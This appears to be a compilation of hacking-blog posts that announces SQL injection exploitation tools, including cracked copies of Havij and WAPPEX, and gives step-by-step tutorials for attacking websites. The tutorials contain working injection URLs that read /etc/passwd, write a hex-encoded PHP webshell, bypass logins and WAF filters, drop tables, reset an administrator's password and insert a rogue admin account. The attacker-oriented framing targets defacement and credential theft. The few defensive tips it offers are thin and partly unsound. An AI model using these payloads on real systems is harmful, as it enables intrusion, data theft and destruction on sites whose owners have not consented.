Enema v.1.6 SQL Injection Tool Released

OpenSource tool for sql injection security testing

SQLSentinel is an opensource tool that automates the process of finding the sql injection on a website. SQLSentinel includes a spider web and sql errors finder. You give in input a site and  


SQLSentinel crawls and try to exploit parameters validation error for you. When job is finished, it can generate a pdf report which contains the url vuln found and the url crawled.  

Download: Here

sqlcake v.1.1 Released

Automatic SQL injection and database information gathering tool.  

Automatic dump database & interactive sql shell tool dumps the current database structure including tables and columns and turns into an interactive mysql prompt with extra features  

- sqlcake is an automatic SQL injection exploitation kit written in Ruby. It's designed for system administration and penetration testing.
- sqlcake offers a few useful functions to gather database information easily by sql injection usage.
- sqlcake also allows you to bypass magic quotes, dump tables and columns and gives you the possibility to run an interactive MySQL shell.
- sqlcake supports union stacked queries for real fast processing and blind injections with logarithmic techniques for saving time. 


Download: Here

BBQSQL - Blind SQL Injection Exploitation Tool

  

BBQSQL is a SQL injection framework specifically designed to be hyper fast, database agnostic, easy to setup, and easy to modify.  The tool is extremely effective at exploiting a particular type of SQL injection flaw known as blind/semi-blind SQL injection.  When doing application security assessments we often uncover SQL vulnerabilities that are difficult to exploit. 

While current tools have an enormous amount of capability, when you can’t seem to get them to work you are out of luck.  We frequently end up writing custom scripts to help aid in the tricky data extraction, but a lot of time is invested in developing, testing and debugging these scripts.  

BBQSQL helps automate the process of exploiting tricky blind SQL injection.  We developed a very easy UI to help you setup all the requirements for your particular vulnerability and provide real time configuration checking to make sure your data looks right.  On top of being easy to use, it was designed using the event driven concurrency provided by Python’s gevent.  This allows BBQSQL to run much faster than existing single/multithreaded applications. 

Download: Here 

jSQL Injection v0.3

 jSQL Injection is a lightweight application used to find database information from a distant server. 

jSQL is free, open source and cross-platform (Windows, Linux, Mac OS X, Solaris). 




Features: 

• GET, POST, header, cookie methods
• Normal, error based, blind, time based algorithms
• Automatic best algorithm selection
• Thread control (start/pause/resume/stop)
• Expose URL calls
• Simple evasion
• Data retrieving progression bar
• Proxy setting
• Distant file reading
• Webshell deposit
• Terminal for webshell commands
• Configuration backup
• jSQL version checker
• Supports MySQL

Download: https://code.google.com

Local File Inclusion and Shell Writing using SQL Injection

First of all hello to all readers whoever is reading this article. Once again I am going to tell you about advance SQL Injection , I am not going to tell you about the basic SQLi stuff and I assume that you’ve already read my previous article about URL Based SQL Injection. If you haven’t read that, please go on the following link:

http://www.hax0rtools.com/2013/09/hacking-website-using-sql-injection.html

This time I am going to tell you about reading (Local File Inclusion) and writing (PHP Code Writing) file through SQL Injection. First of all in order to read or write the files from the database server (usually web servers because 90% cases both database and web server is the same computer), we must have file privileges.

Let us assume the example of previous article having the following URL:

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,3,4–

Now assuming the vulnerable column is 3, we can check the current user by injecting @@user or user() in place of 3:

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,user(),4–

If the user is root@localhost, then chances of file privileges are more. If your target doesn’t have ‘root’ as a user, don’t loose your heart we still might have file privileges. To check the file privileges we can execute the following query:

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,file_priv,4 where username=user();–

If we are getting a ‘Y’ then we have file privileges and we can read or write files. But if it doesn’t reply ‘Y’ we can still try by reading a file from the server. The file which we should read is ‘/etc/passwd’ as it is usually available to all users on linux/unix platform. To read the files from the server we will use the function load_file():

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,load_file(‘/etc/passwd’),4–

Sometimes, the apostrophe (‘) is blocked in the URL so we can encode our file location in hexadecimal code like below:

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,load_file(0x2f6574632f706173737764),4–

NOTE: Don’t forget to put ‘0x’ before the hexadecimal code.

If we are able read the passwd file, then we may try for other configuration files for further exploitations, like httpd.conf.

In order to write files on the server we must note that if the apostrophe is blocked in the URL then we cannot write the file on the server as it require the use of apostrophe. Now as we know apostrophe is required, let us assume that apostrophe is not blocked so we can write the file. To write a file on the server we will be using “INTO OUTFILE” as below:

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,’Kyrion Hacking Tutorials’,4 INTO OUTFILE ‘/tmp/pentest.txt’–

It is a good practice to write files in /tmp directory, as all users have writing priviliges in /tmp directory. We can read the file from/tmp directory again to confirm:

http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,load_file(‘/tmp/pentest.txt’),4–

After confirming the file which we’ve written we can write a webshell on the target website after encoding the shell code into hexadecimal. Assuming that web directory is “/var/www/html/” (which we can confirm after reading httpd.conf) and code which we want to write in test.php is‘<?php echo  “ Kyrion Hacking Tutorials” ?>’ , the URL will be:

http://www.site.com/news.php?id=-4 UNION ALL SELECT1,2,unhex(3c3f706870206563686f2020221c4b7972696f6e204861636b696e67205475746f7269616c7322201d203f3e),4 INTO OUTFILE ‘/var/www/html/test.php’–

As you might’ve noticed that the code which we are going to write must be encoded in hexadecimal else it will not work. Now we can execute the code by just going to the URL:

http://www.site.com/test.php

This is how you can read and write files on a server using SQL Injection. Using the above method one can write malicious code, e.g. webshells on a website using SQL Injection vulnerability. I hope some of you will find this useful.

Hack Websites Using Havij [SQL Injection Tutorial]

According to a survey the most common technique of hacking a website is SQL Injection. SQL Injection is a technique in which hacker insert SQL codes into web Forum to get Sensitive Information like (User Name , Passwords) to access the site and Deface it. The traditional SQL injection method is quite difficult, but now a days there are many tools available online through which any script kiddie can use SQL Injection to deface a webite, because of these tools websites have became more vulnerable to these types of attacks.

One of the popular tools is Havij, Havij is an advanced SQL injection tool which makes SQL Injection very easy for you, Along with SQL injection it has a built in admin page finder which makes it very effective.

Warning - This article is only for education purposes, By reading this article you agree that Hacky Shacky is not responsible in any way for any kind of damage caused by the information provided in this article.

Supported Databases With Havij

• MsSQL 2000/2005 with error.

• MsSQL 2000/2005 no error union based

• MySQL union based

• MySQL Blind

• MySQL error based

• MySQL time based

• Oracle union based

• MsAccess union based

• Sybase (ASE)

Demonstration

Now i will Show you step by step the process of SQL injection.
Step1: Download Havij Pro V1.16 Cracked
Step2: Find SQL injection Vulnerability in tour site and insert the string (like http://www.target.com/index.asp?id=123) of it in Havij as show below.

Step3: Now click on the Analyse button as shown below.

Now if the your Server is Vulnerable the information about the target will appear and the columns will appear like shown in picture below:

Step4: Now click on the Tables button and then click Get Tables button from below column as shown below:

Step5: Now select the Tables with sensitive information and click Get Columns button.After that select the Username and Password Column to get the Username and Password and click on the Get Table button.

Countermeasures: 

Here are some of the countermeasures you can take to reduce the risk of SQL Injection

1. Renaming the admin page will make it difficult for a hacker to locate it
2. Use a Intrusion detection system and compose the signatures for popular SQL injection strings
3. One of the best method to protect your website against SQL Injection attacks is to disallow special characters in the admin form, though this will make your passwords more vulnerable to bruteforce attacks but you can implement a capcha to prevent these types of attack.

Common Methods to Hack a Website

Gone are the days when website hacking was a sophisticated art. Today any body can access through the Internet and start hacking your website. All that is needed is doing a search on google with keywords like “how to hack website”, “hack into a website”, “Hacking a website” etc. The following article is not an effort to teach you website hacking, but it has more to do with raising awareness on some common website hacking methods.


The Simple SQL Injection Hack

SQL Injection involves entering SQL code into web forms, eg. login fields, or into the browser address field, to access and manipulate the database behind the site, system or application.
When you enter text in the Username and Password fields of a login screen, the data you input is typically inserted into an SQL command. This command checks the data you've entered against the relevant table in the database. If your input matches table/row data, you're granted access (in the case of a login screen). If not, you're knocked back out.

In its simplest form, this is how the SQL Injection works. It's impossible to explain this without reverting to code for just a moment. Don't worry, it will all be over soon.
Suppose we enter the following string in a User name field:

' OR 1=1  

The authorization SQL query that is run by the server, the command which must be satisfied to allow access, will be something along the lines of:
SELECT * FROM users WHERE username = ‘USRTEXT '
AND password = ‘PASSTEXT’
…where USRTEXT and PASSTEXT are what the user enters in the login fields of the web form.
So entering `OR 1=1 — as your username, could result in the following actually being run:
SELECT * FROM users WHERE username = ‘' OR 1=1 — 'AND password = '’
Two things you need to know about this:
['] closes the [user-name] text field.
'' is the SQL convention for Commenting code, and everything after Comment is ignored. So the actual routine now becomes:
SELECT * FROM users WHERE user name = '' OR 1=1
1 is always equal to 1, last time I checked. So the authorization routine is now validated, and we are ushered in the front door to wreck havoc.
Let's hope you got the gist of that, and move briskly on.

Brilliant! I'm gonna go to hack a Bank!
Slow down, cowboy. This half-cooked method won't beat the systems they have in place up at Citibank,
evidently


But the process does serve to illustrate just what SQL Injection is all about — injecting code to manipulate a routine via a form, or indeed via the URL. In terms of login bypass via Injection, the hoary old ' OR 1=1 is just one option. If a hacker thinks a site is vulnerable, there are cheat-sheets all over the web for login strings which can gain access to weak systems. Here are a couple more common strings which are used to dupe SQL validation routines:
username field examples:

• admin'—
• ') or ('a'='a
• ”) or (“a”=”a
• hi” or “a”=”a

… and so on.

Cross site scripting ( XSS ):

Cross-site scripting or XSS is a threat to a website's security. It is the most common and popular hacking a website to gain access information from a user on a website. There are hackers with malicious objectives that utilize this to attack certain websites on the Internet. But mostly good hackers do this to find security holes for websites and help them find solutions. Cross-site scripting is a security loophole on a website that is hard to detect and stop, making the site vulnerable to attacks from malicious hackers. This security threat leaves the site and its users open to identity theft, financial theft and data theft. It would be advantageous for website owners to understand how cross-site scripting works and how it can affect them and their users so they could place the necessary security systems to block cross-site scripting on their website.

Denial of service ( Ddos attack )

A denial of service attack (DOS) is an attack through which a person can render a system unusable or significantly slow down the system for legitimate users by overloading the resources, so that no one can access it.this is not actually hacking a webite but it is used to take down a website.
If an attacker is unable to gain access to a machine, the attacker most probably will just crash the machine to accomplish a denial of service attack,this one of the most used method for website hacking



Cookie Poisoning:

Well, for a starters i can begin with saying that Cookie Poisoning is alot like SQL Injection

Both have 'OR'1'='1 or maybe '1'='1'

But in cookie poisoning you begin with alerting your cookies

Javascript:alert(document.cookie)

Then you will perharps see "username=JohnDoe" and "password=iloveJaneDoe"

in this case the cookie poisoning could be:

Javascript:void(document.cookie="username='OR'1'='1"); void(document.cookie="password='OR'1'='1");

It is also many versions of this kind... like for example

'

'1'='1'

'OR'1'='1

'OR'1'='1'OR'

and so on...

You may have to try 13 things before you get it completely right...

Password Cracking

Hashed strings can often be deciphered through 'brute forcing'. Bad news, eh? Yes, and particularly if your encrypted passwords/usernames are floating around in an unprotected file somewhere, and some Google hacker comes across it.
You might think that just because your password now looks something like XWE42GH64223JHTF6533H in one of those files, it means that it can't be cracked? Wrong. Tools are freely available which will decipher a certain proportion of hashed and similarly encoded passwords.

Know more about Brute force attack

A Few Defensive Measures

* If you utilize a web content management system, subscribe to the development blog. Update to new versions soon as possible.
* Update all 3rd party modules as a matter of course — any modules incorporating web forms or enabling member file uploads are a potential threat. Module vulnerabilities can offer access to your full database.
* Harden your Web CMS or publishing platform. For example, if you use WordPress, use this guide as a reference.
* If you have an admin login page for your custom built CMS, why not call it 'Flowers.php' or something, instead of “AdminLogin.php” etc.?
* Enter some confusing data into your login fields like the sample Injection strings shown above, and any else which you think might confuse the server. If you get an unusual error message disclosing server-generated code then this may betray vulnerability.
* Do a few Google hacks on your name and your website. Just in case…
* When in doubt, pull the yellow cable out! It won't do you any good, but hey, it rhymes. 

WAPPEX1.0 + CRACK {WEB APPLICATION EXPLOITER + CRACK}

WAPPEX1.0 + CRACK {WEB APPLICATION EXPLOITER + CRACK}

Download Link 2

DIS9 SQL INJECTION – TOOLKIT

With This simple Script PHP U’r Can Inject SQL’s/MySQL Database’s

Use for Exploiting some Vulnerabilites SQLi in U’r Target.

Download Latest version : Dis9-SQLi_v0.1.rar (138.9 kB)

SQL Injection Tutorial: All common SQL injection problems and Solutions

Hello  ,
    Today I'll write an tutorial for you what covers most problems while doing SQL injection and solutions to them. Probably every person who has looked at tutorials to hack a website have noticed that there are too much SQL tutorials. Almost every forum has 10 tutorials and blogs 5 tutorials aboutSQL injection, but actually those tutorials are stolen from somewhere else and the author doesn't probably even know why does SQL injection work. All of those tutorials are like textbooks with their ABC's and the result is just a mess. Everyone are writing tutorials about SQL, but nobody covers the problems what will come with that attack.

What is the cause of most problems related to SQL injection?

Webdevelopers aren't always really dumb and they have also heard of hackers and have implemented some security measures like WAF or manual protetion. WAF is an Web application firewall and will block all malicous requests, but WAF's are quite easy to bypass. Nobody would like to have their site hacked and they are also implementing some security, but ofcourse it would be false to say that if we fail then it's the servers fault. There's also a huge possibility that we're injecting otherwise than we should.

A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. By customizing the rules to your application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.

If you're interested about WAF's and how they're working then I suggest to read it from wikipedia http://en.wikipedia.org/wiki/Application_firewall 


Order by is being blocked?

It rarely happens, but sometimes you can't use order by because the WAF has blocked it or some other reasons. Unfortunally we can't skip the order by and we have to find another way. The way is simple, instead of using Order by we have to use Group by because that's very unlikely to be blacklisted by the WAF.

If that request will return 'forbidden' then it means it's blocked.

http://site.com/gallery?id=1 order by 100--

Then you have to try to use Group by and it will return correct :

http://site.com/gallery?id=1 group by 100-- / success

Still there's an possibility that WAF will block the request, but there's on other way also and that's not very widely known. It's about using ( the main query ) = (select 1)

http://example.org/news.php?id=8 and (select * from admins)=(select 1)

Then you'll probably recive an error like this : Operand should contain 5 column(s).

That error means there are 5 columns and it means we can proceed to our next step what's union select. The command was different than usual, but the further injection will be the same.

http://site.com/news.php?id=-8 union select 1,2,3,4,5--

'order by 10000' and still not error?

That's an small chapter where I'll tell you why sometimes order by won't work and you don't see an error. The difference between this capther and the last one is that previously your requests were blocked by the WAF, but here's the injection method is just a littlebit different. When I saw that on my first time then I thought how does a Database have 100000 columns because I'm not getting the error while the site is vulnerable?

The answer is quite logical. By trying order by 1000000 we're not getting the error because there are so many columns in there, we're not getting the error because our injecting isn't working.

Example : site.com/news.php?id=9 order by 10000000000-- [No Error]

to bypass this you just have to change the URL littlebit.Add ' after the ID number and at the end just enter +

Example : 

site.com/news.php?id=9' order by 10000000--+[Error]

If the last example is working for you then it means you have to use it in the next steps also, there isn't anything complicated, but to make everything clear I'll still make an example.

http://site.com/news.php?id=-9' union select 1,2,3,4,5,6,7,8--+

Extracting data from other database.

Sometimes we can inject succesfully and there doesn't appear any error, it's just like a hackers dream. That dream will end at the moment when we'll see that there doesn't exist anything useful to us. There are only few tables and are called "News", "gallery" and "articles". They aren't useful at all to us because we'd like to see tables like "Admin" or "Administrator". Still we know that the server probably has several databases and even if we have found the information we're looking for, you should still take a look in the other databases also.

This will give you Schema names.

site.com/news.php?id=9 union select 1,2,group_concat(schema_name),4 from information_schema.schemata

And with this code you can get the tables from the schema.

site.com/news.php?id=9 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=0x

This code will give you the column names.

site.com/news.php?id=9 union select 1,2,group_concat(column_name),4 from information_schema.tables where table_schema=0x and table_name=0x

I get error if I try to extract tables.

site.com/news.php?id=9 union select 1,2,group_concat(table_name),4 from information_schema.tables

Le wild Error appears.

"you have an error in your sql syntax near '' at line 1"
Change the URL for this
site.com/news.php?id=9 union select 1,2,concat(unhex(hex(table_name),4 from information_schema.tables limit 0,1--

How to bypass WAF/Web application firewall

The biggest reason why most of reasons are appearing are because of security measures added to the server and WAF is the biggest reason, but mostly they're made really badly and can be bypassed really easily. Mostly you will get error 404 like it's in the code below, this is WAF. Most likely persons who're into SQL injection and bypassing WAF's are thinking at the moment "Dude, only one bypassing method?", but in this case we both know that bypassing WAF's is different kind of science and I could write a ebook on bypassing these. I'll keep all those bypassing queries to another time and won't cover that this time.

"404 forbidden you do not have permission to access to this webpage"

The code will look like this if you get the error

http://www.site.com/index.php?id=-1+union+select+1,2,3,4,5--

[Error]

Change the url Like it's below.

http://www.site.com/index.php?id=-1+/*!UnIoN*/+/*!sELeCt*/1,2,3,4,5--

[No error]

Is it possible to modify the information in the database by SQL injection?

Most of people aren't aware of it, but it's possible. You're able to Update, Drop, insert and select information. Most of people who're dealing with SQL injection has never looked deeper in the attack than shown in the average SQL injection tutorial, but an average SQL injection tutorial doesn't have those statements added. Most likely because most of people are copy&pasting tutorials or just overwriting them. You might ask that why should one update, drop or insert information into the database if I can just look into the information to use the current ones, why should we make another Administrator account if there already exists one?

Reading the information is just one part of the injection and sometimes those other commands what are quite infamous are more powerful than we thought. If you have read all those avalible SQL injectiontutorials then you're probably aware that you can read the information, but you didn't knew you're able to modify it. If you have tried SQL injecting then you have probably faced some problems that there aren't administrator account, why not to use the Insert command to add one? There aren't admin page to login, why not to drop the table and all information so nobody could access it? I want to get rid of the current Administrator and can't change his password, why not to use the update commands to change the password of the Administrator?

You have probably noticed that I have talked alot about unneccesary information what you probably don't need to know, but that's an information you need to learn and understand to become a real hacker because you have to learn how SQL databases are working to fiqure it out how those commands are working because you can't find tutorials about it from the network. It's just like math you learn in school, if you won't learn it then you'll be in trouble when you grow up.

Theory is almost over and now let's get to the practice.

Let's say that we're visiting that page and it's vulnerable to SQL injection.

http://site.com/news.php?id=1

You have to start injecting to look at the tables and columns in them, but let's assume that the current table is named as "News".
With SQL injection you can SELECT, DROP, UPDATE and INSERT information to the database. The SELECT is probably already covered at all the tutorials so let's focus on the other three. Let's start with the DROP command.

I'd like to get rid of a table, how to do it? 

http://site.com/news.php?id=1; DROP TABLE news

That seems easy, we have just dropped the table. I'd explain what we did in the above statement, but it's quite hard to explain it because you all can understand the above command. Unfortunally most of 'hackers' who're making tutorials on SQL injection aren't aware of it and sometimes that three words are more important than all the information we can read on some tutorials.

Let's head to the next statement what's UPDATE. 

http://site.com/news.php?id=1; UPDATE 'Table name' SET 'data you want to edit' = 'new data' WHERE column_name='information'--

Above explanation might be quite confusing so I'll add an query what you're most likely going to use in real life : 

http://site.com/news.php?id=1; UPDATE 'admin_login' SET 'password' = 'Crackhackforum' WHERE login_name='Rynaldo'--

We have just updated Administrator account's password.In the above example we updated the column called 'admin_login" and added a password what is "Crackhackforum" and that credentials belongs to account which's username is Rynaldo. Kinda heavy to explain, but I hope you'll understand.


How does INSERT work?


Luckily "INSERT" isn't that easy as the "DROP" statement is, but still quite understandable. Let's go further with Administrator privileges because that's what most of people are heading to. Adding an administrator account would be like this : 

http://site.com/news.php?id=1; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (2,'Rynaldo','Crackhackforum','NA')--

INSERT INTO 'admin_login' means that we're inserting something to 'admin_login'. Now we have to give instructions to the database what exact information we want to add, ('login_id', 'login_name', 'password', 'details') means that the specifications we're adding to the DB are Login_id, Login_name, password and details and those are the information the database needs to create a new account. So far we have told the database what information we want to add, we want to add new account, password to it, account ID and details. Now we have to tell the database what will be the new account's username, it's password and account ID, VALUES (2,'Rynaldo','Crackhackforum','NA')-- . That means account ID is 2, username will be Rynaldo, password of the account will be Crackhackforum. Your new account has been added to the database and all you have to do is opening up the Administrator page and login. 

Passwords aren't working

Sometimes the site is vulnerable to SQL and you can get the passwords.Then you can find the sites username and password, but when you enter it into adminpanel then it shows "Wrong password".This can be because those usernames and passwords are there, but aren't working. This is made by site's admin to confuse you and actually the Cpanel doesn't contain any username/password. Sometimes are accounts removed, but the accounts are still in the database. Sometimes it isn't made by the admin and those credentials has been left in the database after removing the login page, sometimes the real credentials has been transfered to another database and old entries hasn't been deleted.

Sometimes i get some weird password

This weird password is called Hash and most likely it's MD5 hash.That means the sites admin has added more security to the website and has encrypted the passwords.Most popular crypting way is using MD5 hash.The best way to crack MD5 hashes is using PasswordsPro or Hashcat because they're the best and can crack the password even if it's really hard or isn't MD5. Also you can use http://md5decrypter.com .I don't like to be a person who's pitching around with small details what aren't correct, but here's an tip what you should keep in mind. The domain is saying it's "md5decryptor" what reffers to decrypting MD5 hashes. Actually it's not possible to decrypt a hash because they're having 'one-way' encryption. One way encryption means it can only be encrypted, but not decrypted. Still it doesn't mean that we can't know what does the hash mean, we have to crack it. Hashes can't be decrypted, only cracked. Those online sites aren't cracking hashes every time, they're saving already cracked hashes & results to their database and if you'll ask an hash what's already in their database, you will get the result. :)

Md5 hash looks like this : 827ccb0eea8a706c4c34a16891f84e7b = 12345
You can read about all Hashes what exist and their description http://pastebin.com/aiyxhQsf
Md5 hashes can't be decrypted, only cracked

How to find admin page of site?


Some sites doesn't contain admin control panel and that means you can use any method for finding the admin page, but that doesn't even exist. You might ask "I got the username and password from the database, why isn't there any admin login page then?", but sometimes they are just left in the database after removing the Cpanel.

Mostly people are using tools called "Admin page finders".They have some specific list of pages and will try them.If the page will give HTTP response 200 then it means the page exists, but if the server responds with HTTP response 404 then it means the page doesn't exist in there.If the page exist what is in the list then tool will say "Page found".I don't have any tool to share at the moment, but if you're downloading it yourself then be beware because there are most of those tools infected with virus's.

Mostly the tools I mentioned above, Admin Page Finders doesn't usually find the administrator page if it's costumly made or renamed. That means quite oftenly those tools doesn't help us out and we have to use an alternative and I think the best one is by using site crawlers. Most of you are probably having Acunetix Web Vulnerability scanner 8 and it has one wonderful feature called site crawler. It'll show you all the pages on the site and will %100 find the login page if there exists one in the page.


Automated SQL injection tools.

Automated SQL injection tools are programs what will do the whole work for you, sometimes they will even crack the hashes and will find the Administrator page for you. Most of people are using automated SQL injection tools and most popular of them are Havij and SQLmap. Havij is being used much more than SQLmap nomatter the other tool is much better for that injection. The sad truth why that's so is that many people aren't even able to run SQLmap and those persons are called script-kiddies. Being a script-kiddie is the worstest thing you can be in the hacking world and if you won't learn how to perform the attack manually and are only using tools then you're one of them. If you're using those tools to perform the attack then most of people will think that you're a script-kiddie because most likely you are. Proffesionals won't take you seriusly if you're injecting with them and you won't become a real hacker neither. My above text might give you an question, "But I've seen that even Proffesional hackers are using SQLmap?" and I'd like to say that everything isn't always black & white. If there are 10 databases, 50 tables in them and 100 columns in the table then it would just take days to proccess all that information.I'm also sometimes using automated tools because it makes my life easier, but to use those tools you first have to learn how to use those tools manually and that's what the tutorial above is teaching you.

Use automated tools only to make your life easier, but don't even look at them if you don't know how to perform the attack manually.

What else can I do with SQL injection besides extracting information?

There are many things besides extracting information from the database and sometimes they are much more powerful. We have talked above that sometimes the database doesn't contain Administrator's credentials or you can't crack the hashes. Then all the injection seems pointless because we can't use the information we have got from the database. Still we can use few another methods. Just like we can conduct CSRF attack with persistent XSS, we can also move to another attacks through SQL injection. One of the solution would be performing DOS attack on the website which is vulnerable to SQL injection. DOS is shortened from Denial of service and it's tottaly different from DDOS what's Distributed Denial of Service. I think that you all probably know what these are, but if I'm taking that attack up with a sentence then DOS will allow us to take down the website temporarely so users wouldn't have access to the site. The other way would be uploading our shell through SQL injection. If you're having a question about what's shell then by saying it shortly, it's a script what we'll upload to the server and it will create an backdoor for us and will give us all the privileges to do what we'd like in the server and sometimes by uploading a shell you're having more rights to modify things than the real Administrator has. After you have uploaded a shell you can move forward to symlink what means we can deface all the sites what are sharing the same server. Shelling the website is probably most powerful thing you can use on the website. I have not covered how to upload a shell through SQL injection and haven't covered how to cause DOS neither, but probably will do in my next tutorials because uploading a shell through SQL is another kind of science, just like bypassing WAF's. Those are the most common methods what attackers will put in use after they can't get anything useful out of the database. Ofcourse every website doesn't have the same vulnerabilities and they aren't responding always like we want and by that I mean we can't perform those attacks on all websites.We have all heard that immagination is unlimited and you can do whatever you'd like. That's kinda true and hacking isn't an exception, there are more ways than I can count. 

What to do if all the information doesn't display on the page?
I actually have really rarely seen that there are so much information on the webpage that it all just don't fit in there, but one person recently asked that question from me and I decided to add it here. Also if you're having questions then surely ask and I'll update the article. If we're getting back to the question then the answer is simple, if all the information can't fit in the screen then you have to look at the source code because everything displayed on the webpage will be in there. Also sometimes information will appear in the tab where usually is the site's name. If you can't see the information then sometimes it's hiddened, but with taking a deeper look you might find it from the source. That's why you always have to look all the solutions out before quiting because sometimes you might think "I can't inject into that..", but actually the answer is hiddened in the source.


What is the purpose of '--' in the union+select+1,2,3,4,5-- ?
I suggest to read about null-byte's and here's a good explanation about it : http://en.wikipedia.org/wiki/Null_character because it might give you some hint why -- is being used . Purpose of adding -- in the end of the URL isn't always neccesary and it depends on the target. It doesn't have any influence to the injection because it doesn't mean anything, but it's still being used because it's used as end of query. It means if I'm injecting as : http://site.com/news.php?id=-1 union select 1,2,3,4,5-- asasdasd then the server will skip everything after -- and asasdasd won't be readed. It's just like adding to masking a shell. Sometimes injection isn't working if -- is missing because -- tells the DB that "I'm the end of query, don't read anything what comes after me and execute everything infront of me". It's just like writing a sentence without a dot, people might think it's not the end of your sentence and will wait until you write the other part of the sentence and the end will come if you add the dot to your sentence.